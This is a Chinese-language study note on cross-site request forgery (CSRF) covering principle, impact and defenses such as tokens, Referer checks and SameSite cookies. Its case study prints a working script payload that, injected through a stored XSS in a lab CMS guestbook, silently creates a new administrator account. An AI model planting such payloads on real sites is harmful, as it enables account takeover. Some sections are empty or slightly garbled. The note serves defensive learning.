1.漏洞描述
跨站请求伪造是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web应用程序上执行非本意的操作,攻击的重点在处于更改状态请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。
2.漏洞原理
攻击者可以伪造当前已经登录用户的身份访问正常的网站,执行非本意的操作。正常的网站,没有对来源请求进行严格的验证和过滤,导致攻击者可以伪造正常用户的请求,达到攻击的目的。
3.漏洞场景
在特殊场景下,客户端向服务器发起更改状态的请求,容易产生CSRF漏洞。
常见场景:
- 银行转账
- 修改密码
4.漏洞评级
⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐ 高危
5.漏洞危害
攻击者借用正常用户的身份,发起更改状态的请求,如:
- 银行转账
- 修改密码
- 修改邮箱
- 群发消息
- 与XSS漏洞结合创建网站后台管理员账号
- ...
6.漏洞验证
7.漏洞利用
- DVWA重置当前用户密码
- CMS创建新管理员
8.漏洞防御
1)无效的防御:
- 使用密码的Cookie。
- 将接受POST请求。
- 多步交易:多步交易,有可能会被恶意攻击者预测
- URL重写:用户的身份信息会暴露在URL中,不建议通过引用另一个漏洞解决当前漏洞
- HTTPS:所以安全机制的前提。
2)有效的防御:
a.
验证Referer字段
- 当前URL的上一个URL。
- 转账页面到转账操作
- 伪造?
b.
二次验证:在关键操作之前,在输入密码或者验证码。
c.
添加Token 验证:
d.
HttpOnly:某些情况下禁止 JS 脚本访问
e.
SameSite:Cookie 属性,浏览器自带安全机制。
9.典型案例
1)CMS创建新用户
方法:攻击者可以利用 XSS 触发 CSRF 攻击。因为,可以利用 JS 发送 HTTP 请求。经过研究受害网站的业务流程,可以构造如下代码:
代码:
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.9.47.44/cms/admin/user.action.php",fal
se);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-
urlencoded");
xmlhttp.send("act=add&username=wj33333&password=123456&password2=123456
&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>前提:
我们发现CSM网站留言板存在xss漏洞
a.第一步:
- 填写留言板并提交。
b.第二步:
- 模仿管理员管理留言板。
- 管理员登录账号
- 查看留言板
到这里就已经完成了添加用户。
- 查看管理员账号,发现是我们添加的账号
- 登录
